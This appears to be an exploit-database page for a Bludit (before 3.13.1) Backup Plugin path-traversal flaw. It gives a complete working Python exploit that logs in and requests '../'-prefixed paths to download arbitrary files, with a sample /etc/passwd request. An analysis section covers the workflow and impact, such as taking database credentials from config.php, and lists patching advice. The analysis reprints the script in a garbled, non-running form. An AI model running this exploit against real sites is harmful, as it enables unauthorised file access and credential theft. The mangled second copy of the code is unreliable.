Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)

Exploit Author: Antonio Cuomo Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2023-06-23 
# -*- coding: utf-8 -*-
#/usr/bin/env python

# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14

import requests
import argparse
from bs4 import BeautifulSoup #pip3 install beautifulsoup4

def main():
        parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
        parser.add_argument('-x', '--url', type=str, required=True)
        parser.add_argument('-u', '--user', type=str, required=True)
        parser.add_argument('-p', '--password', type=str, required=True)
        parser.add_argument('-f', '--file', type=str, required=True)
        args = parser.parse_args()
        print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)","\nExploit Author: Antonio Cuomo (Arkantolo)\n")
        exploit(args)

def exploit(args):
    s2 = requests.Session()

    url = args.url.rstrip("/")

    #get csrf token
    r = s2.get(url+'/admin/')
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name':'tokenCSRF'})['value']

    #login
    body= {'tokenCSRF':formtoken,'username':args.user,'password':args.password}
    r = s2.post(url+'/admin/', data=body, allow_redirects=False)
    if(r.status_code==301 and r.headers['location'].find('/admin/dashboard') != -1):
        print("[*] Login OK")
    else:
        print("[*] Login Failed")
        exit(1)

    #arbitrary download
    r = s2.get(url+'/plugin-backup-download?file=../../../../../../../../'+args.file)
    if(r.status_code==200 and len(r.content)>0):
        print("[*] File:")
        print(r.text)
    else:
        print("[*] Exploit Failed")
        exit(1)

if __name__ == '__main__':
main()


Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) Vulnerability Analysis

Bludit, a lightweight open-source content management system (CMS), has long been praised for its simplicity and ease of deployment. However, versions prior to 3.13.1 contain a critical security flaw in the Backup Plugin that enables authenticated attackers to perform arbitrary file downloads. This vulnerability, discovered by Antonio Cuomo (arkantolo) in July 2022, highlights how seemingly benign features can become gateways for serious exploitation.

Understanding the Vulnerability

The core issue lies in the /plugin-backup-download endpoint, which allows authenticated users to download backup files. While intended for legitimate backup operations, the plugin fails to properly sanitize the file parameter passed via GET request. An attacker can manipulate this parameter to traverse the filesystem using ../../../../../../../../ sequences, effectively bypassing directory restrictions and accessing sensitive files.

For example, an attacker could request:

GET /plugin-backup-download?file=../../../../../../../../etc/passwd

Without proper input validation, the server returns the contents of /etc/passwd — a file containing system user information. This demonstrates how a misconfigured plugin can expose critical system data.

Exploitation Workflow

The exploit requires authentication, meaning the attacker must first gain access to an admin account. The process involves three stages:

  • CSRF Token Acquisition: The attacker retrieves the CSRF token from the login page to bypass anti-CSRF protections.
  • Authentication: Using the token, the attacker logs in with valid credentials.
  • Arbitrary File Download: After login, the attacker sends a crafted request to the backup plugin endpoint with a path traversal payload.

Real-World Impact and Use Cases

This vulnerability is particularly dangerous in environments where:

  • Bludit is used for hosting sensitive content (e.g., internal documentation).
  • Administrators reuse passwords across multiple systems.
  • File systems contain configuration files with hardcoded credentials.

For instance, an attacker could retrieve config.php or database.php files to extract database connection details, enabling further attacks such as SQL injection or database exfiltration.

Code Example and Exploit Analysis

The following Python script demonstrates the exploit:

import requests
import argparse
from bs4 import BeautifulSoup

def main():
    parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
    parser.add_argument('-x', '--url', type=str, required=True)
    parser.add_argument('-u', '--user', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    parser.add_argument('-f', '--file', type=str, required=True)
    args = parser.parse_args()

    print("\nBludit  0:
        print("[*] File:")
        print(r.text)
    else:
        print("[*] Exploit Failed")
        exit(1)

if __name__ == '__main__':
    main()

Explanation: This script automates the exploitation process. It first retrieves the CSRF token from the login page using BeautifulSoup to parse HTML. It then performs a POST request to authenticate the user. Finally, it sends a GET request with a path traversal payload to download arbitrary files. The exploit succeeds only if the server returns a 200 status code and non-empty content.

Security Recommendations

To mitigate this vulnerability, developers and administrators should:

  • Update Bludit to version 3.13.1 or later, where the patch has been implemented.
  • Implement strict input validation on all file path parameters, especially in plugins.
  • Use whitelisting instead of blacklisting for file paths — only allow predefined directories.
  • Enforce role-based access control to limit backup functionality to trusted users.
  • Monitor logs for suspicious requests containing path traversal patterns.

Technical Insight: Why Path Traversal Works

Path traversal attacks rely on the fact that many web servers and applications do not properly normalize file paths. The ../../../../ sequence allows an attacker to move up through directory levels, potentially reaching root directories. The lack of proper sanitization in Bludit’s backup plugin means that the application treats user input as a literal file path without checking for security boundaries.

This is a classic example of path traversal vulnerability — a common issue in web applications that can lead to data leakage, privilege escalation, or even remote code execution if combined with other flaws.

Conclusion

While Bludit is designed for simplicity, this vulnerability underscores the importance of security-by-design. Even small plugins can introduce significant risks if not rigorously tested. Developers must prioritize input validation, access control, and regular updates. For administrators, this exploit serves as a reminder to never assume that a CMS is inherently secure — always verify versions, patch vulnerabilities, and monitor access patterns.